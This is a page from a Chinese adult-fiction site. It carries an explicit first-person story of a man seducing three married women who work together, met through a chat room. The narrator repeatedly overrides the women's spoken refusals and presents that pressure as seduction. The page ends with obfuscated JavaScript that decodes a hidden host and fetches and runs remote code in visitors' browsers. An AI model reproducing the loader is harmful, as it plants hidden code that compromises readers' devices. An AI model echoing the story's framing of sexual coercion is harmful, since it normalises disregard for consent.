返回

我和“三姐妹”的风流性事35d

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

这“三姐妹”不是真正意义上的同胞姐妹,而是三个互为好朋友关系的女人,这三人在同一个单位上班,都有家室子女,思想观念和大多数女人一样传统,绝非荡妇,但通过网络,我认识了她们,并慢慢地在现实生活中陆续和她们发生了性关系。

(一)相识

我是一个商界小人物,三十出头,开了一家小公司,业务不多,营利倒过得去,所以不是很忙,由于到现还没女友,在学会了上网聊天后,就经常一个人躲在住处里上网聊天,心想,最好能有什么艳遇什么的,呵(你也有吧?)因此,我就成了本地聊天室的常客,本地网友,见面方便。

一天中午,在聊天室里告别了一位聊友后,无聊的我,在网友列表中无目标地看着女网友的名字,随意间点了一位叫“曼玲”的女的,“你好,可以聊吗?”

我打了一个招呼,对方回话也很及时,反正没事干,我就和她瞎聊了。问这问那的,感觉还不错。我是一个诚聊者,在网上,我一般不习惯骗对方,当对方问我不方便回答的问题时,我就明确地告诉其我不想说或不便说。可能是我的诚恳,我发现自己在网上还是蛮受异性欢迎的,这一次也一样,当曼玲说要下线的时候,我问她是否还愿意继续和我聊?她很爽快地说,愿意。还告诉我,她对我感觉不错。于是我们就约好明天同一时间到这儿继续聊。往后的几天,我们每天中午都相约聊天,聊天中,我知道她是一位老师,中年(比我长几岁),每天只有中午时间能聊天。

更重要的是,我感觉我们开始网恋了,这一点,她也承认。于是网聊在天天继续,我们之间在网上也越来越亲热了。

有一天,当我和曼玲正酣聊时,突然来了一个叫“冰山上的雪莲”的女人主动问我:“帅哥!愿意聊吗?”此时的我,心里哪装得下别的女人呀,立马回了一句:“对不起,我在忙!”对方就不说话了。没几分钟,又来了一位叫“花雨”的女的,也主动找我聊,我同样给予了婉拒。可是这还是减慢了我和曼玲的说话速度,曼玲有了感觉,问我是不是也和别人一起聊。我就如实告诉她,结果曼玲说:“你通过考验了!”“怎么回事?”

我很奇怪地问。原来,这两个找我聊天的女的是曼玲的两位女同事,她们三人关系很好,常一起玩,中午时间也常坐在各自办公室里互相聊天,因为我的出现,曼玲有有些日子没怎么和她们两说话了,两人就跑到曼玲的办公室问她:“网恋了吧?”我和曼玲在聊天室说的话也被看了,曼玲只好承认。两人就说自告奋勇,说帮她考察考察我是否真心和专一。于是才有了刚才的那一段插曲。这以后,曼玲更加放心地在网上向我坦露自己的情感,我和她的网上情思也与日俱增。同时,当我和雪莲或花雨相遇时,我们也会互相说说话,当然,此时的我只当她们是普通网友。

二、曼玲

我知道我和曼玲在现实中见面的时机成熟了,于是在一次网聊时,我提议和她见面,曼玲没有反对,于是我们就约好第二天中午到我的住处见面。第二天中午,我们按约先在网上接头,说好我的位置等细节后,曼玲就下线了出发了。此刻的我,心里真得激动地要死,不停地想像着她的样子,不停地设计见面后自己的言行,心跳得特别的利害。终于在门外楼梯上响起了款款的脚步声,越来越清脆,是一双女人高跟鞋敲击地面的声响,正在我寻细是不是曼玲到了的时候,门铃响了,到了!我以最快的速度冲到门口,打开了门。

一位身穿深色丝质连衣裙、黑色细高跟,身材姣巧的中年女子站在我的面前,虽不算很标致,但长相尚可,中年的她,显得成熟而有姿色。我赶紧迎她进房,努力压制住初见的拘谨,用老朋友的口气说,请进!请坐!喝水吗?等等。曼玲显然也很拘束,面前的她,完全不像聊天室里的恋人,毕竟身处一个陌生男人的家里,带着女人常有的害羞和胆怯。

我知道我喜欢上了这个女人,我也明显地感觉到我想得到她的情感和肉体。我和她一起坐在客厅的沙发上,没话找话地和她聊,为了让她放松,我拚命地讲我和她在聊天室里的情感交往过程,以帮她在现实的情感中也能较快地接纳我。慢慢地,我开始试着抱她,她有点不能适应,身子不停地向后退。我哪里舍得这送上门来的机会呀!一边凑进她,一边劝说她,可能是第一次见面,最终她还是拒绝了和我的身体接触,说,需要一段时间来适应。快到上班时间了,我送走了她。

网聊在继续,我也继续约她再来我家。第一次见面后的一个多月里,她又来过我家二三回,同样没有完全答应和我的性要求,不过也有进展,我在她的半推半就中撩起她的上衣摸过她的奶子,在摸她奶子的时候,我注意到她并没有收起笑容,只说不要这样,不要这样。我知道,快有戏了。

在下一次的相处时,我同样以半暴力半温柔的方式向她的身体发动进攻,已到夏天,我说到卧室去吧,里面有空调,她答应了,我抱起她放在床上,然后躺在她的边上,我在抱吻她后,开始拉开她牛仔裤的拉链,她一开始不肯,我说,你穿着不热了,脱了吧,一边继续拉她裤子的拉链,攻势进行了好几次后,终于她不再推开我的手了,我看准时机,一下子拉开了拉链,然后帮她把裤子褪了下来,哇,一条小小的半透明白色内裤呈现在我的面前,隐隐地可以看见里面那一堆黑黑的毛团,接着,在我的热吻中,我脱下了她的上衣和文胸。

我迫不及待地将整个人压在了她的身上,不停地吻她,不停的抚摸她,她的口气在我耳边越来越重,越来越急。

我的唇离开了她的嘴,慢慢地往下吻,耳朵、下巴、脖子、胸、奶子、肚皮,然后隔着内裤用舌头刺激她的阴部,此时,曼玲的内裤早已被淫水浸湿,散发着一股特有的气味,我故意不长时间刺激她的阴部,转而托起她裸露地性感大腿,在她私处周边区域亲吻,舌尖轻柔地在她的大腿内侧一下一下地滑动,我感觉她在颤抖。我又将她的小脚丫放在嘴里,按个地吸吮她的趾头,当舌头在她的趾缝中穿行时,曼玲发出了轻声的呻吟。等我享受完了她的脚后,我这才回到她的私处,认真刺激她的外阴,淫水更多了,正对着阴道口的裤面已经近乎全透明,我轻轻地拉下她的内裤,然后继续亲吻她的私处,曼玲的手在不停地抓我,我知道,她已经欲火中烧了。

我将自己那涨硬得发紫的JJ插入了她的身体,开始慢慢抽动,里面湿润极了,虽然她已有生育史,但她的阴道并不大,JJ包在里面还很有感觉,在曼玲的呻吟声中,我终于无法自制,在她的体内来了一次狂喷。激情过后,我和她温情地抱在了一起。

三、雪莲

那一次灵与肉的融合后,我和曼玲成为了一对正真的情人,不能见面时,就在中午时间在网上说话,一有机会,她就会隔三差五地来我住处激情一番,那阵子,真的幸福死了。可是好景不长,几个月后的一天,曼玲告诉我,因为孩子的原因,以后中午没那么有空了,包括上网,可能都不再有充足的时间。果然,往后曼玲每天中午到很晚才上线,上线后十多分种就上班了,有时干脆不上线。我的心一下变得很空洞,还是每天不停地在网上空等,希望早点看到曼玲的名字。

在守候的日子里,我倒是能经常看到雪莲和花雨在聊天室出现,我和曼玲的恋情,她们都已知道,所以我常向她俩打听曼玲是否已经到校。同时也和她们随意地说说话。将近一年的时间,就这样过了,这一年里,我和曼玲没有见过一次面,最多也只是在网上匆匆地说上几句。她的这两位姐妹,倒和我越来越熟了。

一天夜里,我无聊地进入了聊天室,碰巧看到了雪莲。我问她晚上怎么上线了?她说,老公出去了,要很晚才回来,自己无事干,就进来打发时间。我说,我也无聊,我们说说话吧。雪莲答应了。可能是我多日没有性生活了,那晚我有点性欲在身,我试探地问雪莲,我们晚上可以放开聊吗?雪莲说可以啊。我又问,聊性话题愿意吗?她说可以。

我就问她性生活的频率之类的话,她说自己性生活不多,质量也不高。原因是老公不行,有时进不去,有时进了又早泄,但大多是硬不起来,无法插入。我就说,此时你要帮帮他的。她说:“怎么帮啊?”我就装成自己很懂的样子对她说:“你可以穿性感一点的内衣裤,在性生活前可以给他口交、手交呀”她说:“老夫老妻的,哪有这么多花样么”我说花样是很重要的,特别是老夫老妻,更要加点刺激。

我建议她如果没有情趣内衣,那做之关就穿长桶丝袜,怎么看上去会好看很多。聊天中,我还说了一个作爱的花样,那些,全是我在H 片里看来的。她听我说了一通后,说“有道理”。我藉机说:“我看过好多H片,老外做爱特放得开,中国人应该学学他们”,又说:“要是你觉得合适的话,可以来我家,我放一些H 片给你启发一下”,她说:“这,这合适吗?”

我赶紧说:“我觉得合适,关键看你的想法了”最后她说,以后再看情况。那晚我们聊了几个小时,聊得很投机,因为大部分都是说性话题,我下面一直涨涨的,聊完了,我还打了一次飞机。往后的一段时间里,雪莲成为我的固定聊友,我们在网上说了很多的话。终于在一个周五的晚上,我看时机成熟了,就在网上请她双休日来有家见个面,随便看看片子。她问了一下我的家庭情况,得知我一个人住,就同意了。我让她来时穿上长桶丝袜,她也没问为什么就答应了。周六,我很早就醒了,哪睡得安稳呀,对吧?我到街上买了一些酒菜,还有一瓶红酒,在家里静静里等雪莲的到来。大约到上午十一点的光景,她按响了我家的门铃。眼前的雪莲和曼玲完全是两种类型的女人,她身材较丰满,两个奶奶把胸涨得好大,一看便是性欲强烈的女人,我想,这样的女人遇上个没用的老公真的会饿得慌。

当然,我知道现在还不能急着去满足她。我直接让她坐到我的电脑桌前,放了一部较为经典的H 片请她先看着,自已到厨房做菜去了。午饭有点浪漫,我们俩个人享用着我精心准备的五菜一汤,在红酒杯碰杯时候交换着眼神……吃完后,我说:“你来洗碗怎么样?今天我们做一对假夫妻吧!”她答应了。洗完碗,我让她继续看片子,我呢,坐在她的边上靠后的位置,我注意到她真的穿着长桶丝袜,包着大腿,看上去很性感。

我说:女人穿丝袜的腿和脚就是好看。随手开始摸她的腿,只几秒钟后,她就把脚移开了,笑笑说自己不习惯。过了一会儿,我起身站到她的身后,摸她的长发,一边闻她那头发的香味,见她没什么拒绝,我就继续摸她的耳和脖子,然后,我很自然地把手放到了她的胸上,轻轻地捏揉她的大奶子,她一开始时把我的手移开,等她的手拿掉后,我又放回到她的胸上,几次后,她就不再拒绝了。

我摸出性子来了,干脆拉她离开座椅,从后面整个地抱住她,我发现她很有反应,气息立刻就变得粗短起来,我继续在肉体上刺激她,双手在我够得着的地方到处游走,她的眼也慢慢地闭上了……就在我想拉她进卧室的时候,她的手机响了,接完电话,她充充地说自己要走了,原因是儿子在朋友家想她,在那边哭着闹着要妈妈。

这多让人难受啊,要是没这电话,几分种后说不定她要会一丝不挂地躺在我的床上了呀,我赶紧要求她等几分种再走,一边更用力地抱她,亲她,摸她,她嘴里说“不要这样,不要这样,我得走了”却没有太利害的拒绝。我抓紧时间,抱起她往床上一扔,然后马上压在她的身上,从她的领口里伸入乳罩抚摸她的乳房,她还在说不要,要回去。我只好加快进度,试图让她早点激起性欲,于是我就用自己的JJ重重地在她的外阴部位来回磨擦,没多久,我突然感觉自己的快感上来了,而且越来越强烈,靠,没多久,我竟然穿着裤子射精了。只好让她走了。

我有点不安,心想头一次见面我就对她这样了,不知道她会不会反感我。

天晚上,我在聊天室里遇到她,对白天的行为向她道歉,谁知她也向我道歉,说什么:“实在是儿子那边不行,否则不会怎么急就走的,你不会怪我吧?”。 我看她对我的所作所为没什么反感,就问她以后还会不会再来我家?她说方便的时候会来的。我就试着请她明天再来,她说明天有事情,只有中午时间有几个小时的空儿。

我说可以啊,中午也行的。她又答应了。午饭后,她来了。这一次,我省掉了一切的细枝末节,一进门就把她紧紧地抱住,又是亲,又是摸,没一分种,我就把拉进了卧室。又一波热吻后,我迫不及待地脱去了她的上衣,也许是都有心理准备的缘故吧,她这次就像是为着做爱而来似的,全程对我配合有加,我先亲遍了她的全身,然后她也把我的JJ放在嘴里,忘情地吸、咬,舒服地要命,然后就直接以坐势把我的JJ放在她的阴道里了……完事后,我们都感觉很刺激,她依在我的怀里躺着,我问:“有多久没这么刺激了?”

她苦笑着说:“这一年多来,一直没有今天这样欢畅过”,我说:“以后我们有机会多在一起些时间吧”,她点了点头。我知道,现在的我在她眼里,已是一个宝,她哪舍得就此放弃我呀!

要是把雪莲和曼玲相对比,其实我更喜欢雪莲。虽然雪莲没曼玲好看,但在性生活上,雪莲更放得开,而曼玲每次做爱时都还带有较浓的害羞,让我无法在她身上尽情地施展。现在我和曼玲也长期失去了联系,只在网上偶然说上几分钟,平时她也没时间来我这儿。我就感觉雪莲的出现对于以性需求为主的我很有必要。

就这样,我和雪莲成了一对真正意义上的性伴侣,在往后的日子里,我们每隔一段时间就要做一次。

四、花雨

说实话,我和花雨没什么感觉,今天想来也是。

在网上老说不到一块,我从没对她有什么企图。但是事情总会变的。在我和雪莲还保持关系的时间,有一段时间我和花雨常在聊天室遇到。在又一次网上吵架后,我就不理她了,她问我为什么这样,我就很直接地告诉她她的说话风格我不能适应,缺少一种真诚。她说她可以改改。还真的好多了,我们以后聊得还不错。慢慢地也聊到了网恋,情人之类的话题,我也以玩笑的口吻说让她当我的情人,她开始不答应,后来我说了很多的理由,告诉她有一个情人是有好处的,一生中只有一个性伴侣不亏得慌,她竟然有点动心了。

这样的网上攻防战打了不知几天,不知几个回合,我权当在逗一个女人玩,不成也没关系。然后有一天,我们竟然聊到了要不要带套做。呵呵,有戏是一定了的。我开始约她玩,她说自己只晚上有空,我就说今晚一起吧,她答应了。晚上,我开车在约好的地点接她来我家,三人中,她最大,不过长相、身材还算过得去,我告诉自己,这人只可初尝,次数多了,肯定没味。

但毕竟是自己未开发的处女地,身边的花雨还是令我很有兴趣。然后那晚她不让我碰她,只愿意坐我边上说话。以后的聊天里,我就不停地问她为什么不答应我,还劝她想开点,她的理由是没心理准备,虽然感觉我是她可以接纳的男人,但一想到要做对不起老公的事,就觉得面前有一道难以迂越的坎。

这一点,我只能理解并尊重,女人的意识没到位,男人猴急是没用的。我就说,那以后我们多见几次面,多说说话。就这样,我一次一次地接她来我家,我也一次一次地试着动她的身体,她基本上都反对,不过,反对的程度在慢慢地减轻,我看到了希望。

又是一次在我家,我和她一起坐在长沙发上,一边说话,一边抱着她,用手抚摸她的背和胸,慢慢地,她不再拒绝,我又让她躺倒地沙发上,开始轻轻地摸她的腿、脚、还有胸,我看到她慢慢闭上了眼睛,好像开始享受这份爱抚,我更大胆地解开了她的上衣扣子,露出一件粉红的乳罩,她的奶子并不大,但位置还是蛮靠上,我隔着乳罩轻轻地抓揉她的一对奶子,还把手伸到里面摸奶头,她已没了反对的念头,只闭着她的眼晴任由我玩弄,我拉她坐起来,一边和她接吻,一边把已经解开扣子的上衣退了下来,一阵热吻后,我一手托起她的背,一手托起她的两腿把她整个地抱了起来,在她耳边轻声地说:我们到卧室去吧!

床上,她直直地躺着,仍是闭着眼,犹如一只待人随意摆布的羔羊,这倒让我放松了起来,我静了静心,坐在她的身边,细细地打量起她的身体来,她比较苗条,但比曼玲要高,从只剩下乳罩的上身看,皮肤白白的,竟很少皱纹,看她的下身,一条黑色中包裙下,是一对穿着玉色长桶袜的美腿,脚也小,纤细的脚趾整齐地排着,不停地撩动着我的性欲。

我半压在她的身上,继续和她接吻,一只手摸她的乳房,另一只手开始脱掉她身上的穿戴……接下来发生的事,也就顺理成章了,做完后,她仍一身不响地躺着,但我从她的眼神和表情里看到了一丝悔意,她一定为刚才发生的事感觉到了负罪感。我胡乱地安慰了她几句后,就不说话了,躺在她边上,继续抱着她,摸她的肉体……

几天后,我和她在聊天室遇到,我问她有没有后悔,她说,后悔,不过都已发生了,也没用了。她说可以接纳我,也愿意继续和我保持这种关系。可是在我们谈到感情方面的问题时,发生了分歧。她希望感情优先,我却不想和她怎么地发展感情,因为我觉得感情深了以后人会很累。当她得知我的这一想法后,非常失望,聊天也进行不下去了。往后在网上也遇到几回,她完全变了一个人,我知道她已放弃了继续当我性伴侣的念头,只把我和她的关系定位回普通网友的规格上。从此,我和花雨再无事发生。

、近况

就这样,几年的时间里,我竟然阴差阳错地和这三个本来就是朋友的女人发生了性关系。从认识她们三人开始,我确实没有要征服她们三个的计划,但随着时间的推移,我竟然尝遍了她们三个,现在想来,还真的很觉得惊奇,也有一份成就感。

我知道,她们三人只知道自己和我有性关系,却互相不知道其它两人和我也有事,我经常想,要是有个机会,我把这三人约到一起,告诉她们我和她们全发生过性关系,那会是什么样的场景?是立马变脸,还是尴尬异常,还是接受现实一起和我上床?

呵呵,当然,我不会怎么干,这也不现实。到了今天,曼玲和花雨早已退出我的生活,只有雪莲,仍然保持着和我的交往,我们也早有了约定,以性为主,做一对性侣,不要刻意地去培养感情。但人和人就是这样,在一起时间长了,特别是肉体交往多了,慢慢地就有了亲情,现在当我和她赤身抱在一起时,我就像抱着自己的老婆一样有一种浓浓的亲情。

我们常一起交流性话题,互相告诉对方自己的性喜好,并主动去配合对方的喜好,我们的性生活质量很高,花样也多,口交、脚交、异物插入、捆绑、肛交、吃精等等我们都尝试过,两人尝到了在平时生活中很难体验到的性刺激,他的老公仍然不怎么行,家庭性生活成功的没几次,所以我们这样高质量的性生活就更加成为她之所需,我也很欣慰能拥有她,虽然岁比我大,但她给我的这份激情,是很难从其它女人那儿获得的,我也没去想这样的关系会一直延续多少年……

评分
相关推荐
3.0分

3.0分 我和三姐妹的故事30e

3.0分

3.0分 我和三姐妹的故事30e

3.0分

3.0分 我和表姐妹的性事232

3.0分

3.0分 我和姐姐妹妹的故事86d

3.0分

3.0分 我和姐姐妹妹的那事a81

3.0分

3.0分 我和姐姐妹妹的故事86d

3.0分

3.0分 我的风流韵事之我和姑姑aa6

3.0分

3.0分 我的风流韵事之我和姑姑aa6

3.0分

3.0分 我和丈母娘的风流往事8a9

3.0分

3.0分 女友的风流姐妹勾引我40b


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};